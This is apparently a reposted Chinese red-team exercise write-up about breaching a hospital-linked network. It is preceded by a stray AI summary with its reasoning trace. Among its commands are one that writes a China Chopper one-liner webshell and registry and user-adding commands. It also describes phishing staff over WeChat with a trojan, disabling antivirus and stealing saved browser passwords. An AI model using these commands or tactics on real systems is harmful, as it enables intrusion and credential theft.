近期某省级HVV实战回忆录
嗯,用户让我帮忙总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要理解文章的主要内容。看起来这篇文章是关于渗透测试的过程,描述了攻击者如何利用SQL注入、社工等手段逐步入侵系统。 文章开始提到攻击者测试了靶标单位的公众号和小程序接口,没发现问题,但通过子域名解析找到了一个.net网站。接着他们发现了SQL注入点,并获得了system权限。然而,上线失败让他们遇到了麻烦,后来尝试写webshell也失败了。 然后他们通过社工手段获取了主任电脑的权限,发现该电脑有双网卡,成功连接到内网服务器。整个过程充满了意外和挑战。 现在我需要将这些关键点浓缩到100字以内。要抓住主要步骤:SQL注入、system权限、上线失败、社工成功、双网卡连接内网服务器。 可能的结构是:攻击者利用SQL注入获取system权限,尝试上线失败后通过社工手段成功入侵主任电脑,利用其双网卡连接到内网服务器。 这样既涵盖了主要步骤,又简洁明了。 </think> 攻击者通过SQL注入获取靶标单位系统权限后尝试上线失败,在多次尝试后通过社工手段成功入侵主任电脑并利用其双网卡连接内网服务器。 2025-10-19 00:0:0 Author: www.freebuf.com(查看原文) 阅读量:13 收藏

前期的信息搜集的话不介绍了,靶标单位的公众号以及小程序等的接口基本上都测试过了,确实没发现问题,如果说真的有洞的话只能说我们比较菜,确实没找到突破口,但是再子域名解析下ip地址的c段找到了一个.net语言开发的网站,功能比较简单,甚至没有后台(在控制之后发现是站库分离,后端在内网的另外一台机子上)。看到的第一点都感觉有注入,简单手工注入测试就找到了注入点。(下面的图片为报告内的部分截图打码以及sqlmap的部分缓存)

图片

查看ip地址为私网172段,切当前用户为system权限

图片

查询网络连接状态

![图片](https://mmbiz.qpic.cn/sz_mmbiz_png veA9QmcJk5mO7Ywd4HcYGCicNW3PPicZicfvEJF89APogGxR5fbhA94gyJHzgrAicokC0KyL1hWjIMEzIxicGnvLw0w/640?wx_fmt=png&from=appmsg&watermark=1#imgIndex=2)

了解到当前内网的网段有18和16段。查询当前进程并没有发现任何杀软,执行命令添加用户并且加入管理员用户组

图片

直接添加成功,到这里是不是以为直接起飞了,执行执行命令certutil上线完事儿了

第一个没想到

死活上线不了,我一直以为是不是杀软的原因,powershell啥的乱七八糟的上线方式都尝试一遍了,一般除了ZW的站来说,互联网映射的一般都可以出网,甚至DMZ区的机器都能出网,本来以为会很顺利,这台机器竟然不出网,这是让我没想到的,ping了dns直接不通,这次真的草率了!!!!!!!!!!

图片

咨询了一堆朋友,尝试了乱七八糟的各种姿势,我竟然一开始就固定思维默认这台机子出网了,真想赏自己俩面条,因为上线问题搞了俩钟头,,,,,,,,,,,

图片

因为不出网,所以下一步的操作根本无法执行

  • 工具无法上传
  • 内网无法横向,甚至windows的机器也无法密码喷洒

于是想起了第二种方式来继续利用这个shell,写webshell端口转发+RDP 。到这里心态又恢复了。

第二个没想到

本来以为写webshell这么简单,我的权限还是system权限,写shell那不是给我送机器么。令我没想到的是执行命令只要涉及到中文路径,统统报错,What?涉及中文路径就报错。真的裂开了

图片

不过没关系,这时候经常写webshell的老哥肯定想到,完全可以查询web路径然后写入webshell。顶多也就是时间问题了,没关系,因为我觉得这个系统必定跟HIS等的系统有关联,瞬间心里信心又回来了。 命令惠存

for /r C:\ %i in (xxx.aspx) do echo %i> %i..\path1.txt 费劲扒拉的跑了半小时,找到了路径

图片

访问web界面的txt

图片

突然感觉又行了。ahhh,接下来就是写webshell,浅浅测试一下txt,发现txt完全没问题。写简单的一句话

图片

cmd /c "d: & echo ^<%eval request("chopper")%^> > \a.aspx" 当然这个命令完全没问题,注意windos的注入是需要防止转义的。又经过了费劲巴拉写进去了。发现a.aspx也写进去了,访问回显代码401

图片

裂开了,白忙活一场,webshell写入了,回显401。前期写shell回显404

图片

试错的成本太高了,告别了写不进入的404迎来了401

前面的方法耗时耗精力,脑补了太多的结发,webshell死活也写不进去。开始脑补社工行不行,开始sql注入进行dump数据 进行爆库,爆表,爆字段

图片

图片

这里可能有同志觉得web业务有了,其实不然,字段内的密码全为加盐的md5,没一个能解的

图片

有通用密码,但是确实猜不到。但是里面的字段有手机号 ,然后结合公众号的互联网医院查询了挂号医生,确认了数据是没有问题的。那么尝试钓鱼试试了。

第三个没想到

本来就是不抱希望的进行钓鱼,因为一般微信直接添加好友询问内容可信度是不高的,但结果出乎我的意料,直接添加成功,询问的自然点儿是没有问题的。

图片

但是比较裂开的是,马子死活不上线

图片

我测试了确实也是免杀的,究竟是什么奇葩原因。我再忐忑究竟是不是因为我VPS被情报社区打标签了。于是开始直接开启不要脸模式 ,社工老师直接开的向日葵便携版

图片

图片

向日葵,真香呀!!!!

第四个没想到

上来直接退出某数字杀软,上线了CS改版的原生马子,没有问题,解释不了免杀马为什么双击上线不了,都是64位操作机,玄学问题。 solo一波机器的浏览器记录以及存贮的账号密码后面备着用,但是没有YL的核心系统,毕竟HIS登录需要Ukey没办法,但是服务器的段是没有问题的,互联网出口的那台机器必定处于核心网。 NPS隧道打起来,端口转发3389,因为直接连接出口服务器的内网的3389同样无法连接。

图片

端口转发出口的那台机子的3389是成功的,因为同时转发了web业务端口,测试是没有问题的,并且再xp_cmdshell下开启RDP,但是3389无法转发成功 ,白添加用户了。真是白瞎了添加的用户。本来我在想是不是端口的问题,使用命令更换RDP端口

reg add"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3388 /f

重启RDP服务

net start TermService

依旧无法转发成功。只有一种可能性网闸 的原因。

无法利用就直接用社工机器横向,内网禁ping,solo工具Fscan扫描也只能使用参数-np,比较慢,扫描内网发现有其它业务服务器,其中发现另一个服务器有业务同样有注入。 同样的方式如法炮制,我感觉又行了,没想到这台机子同样无法出网。机器的环境类似,无杀软但是又system权限。

图片

就打了几台打印机,获取了部分数据无了。这个时候感觉没戏了。

还是不想死心,上面三台机器可能同时一个科室的,尝试能不能社工一台其它科室的机器,还是利用上面dump出的手机号,社工另外一名老师

图片

okkk,直接开开搞,只要接电话接的够自信,别人永远不会质疑你 ,比较幸运的是这个老师有事情给我推了另外一个老师,有中间人介绍这种情况下的信任是最牢固的。

图片

某主任的电脑出网是跟上面的老师聊天出网的。

第五个没想到(转折)

主任的终端果然是双网卡 ,太香了!!!!

图片

主任的机器上有inode ,连接上Inode


文章来源: https://www.freebuf.com/articles/web/453283.html
如有侵权请联系:admin#unsafe.sh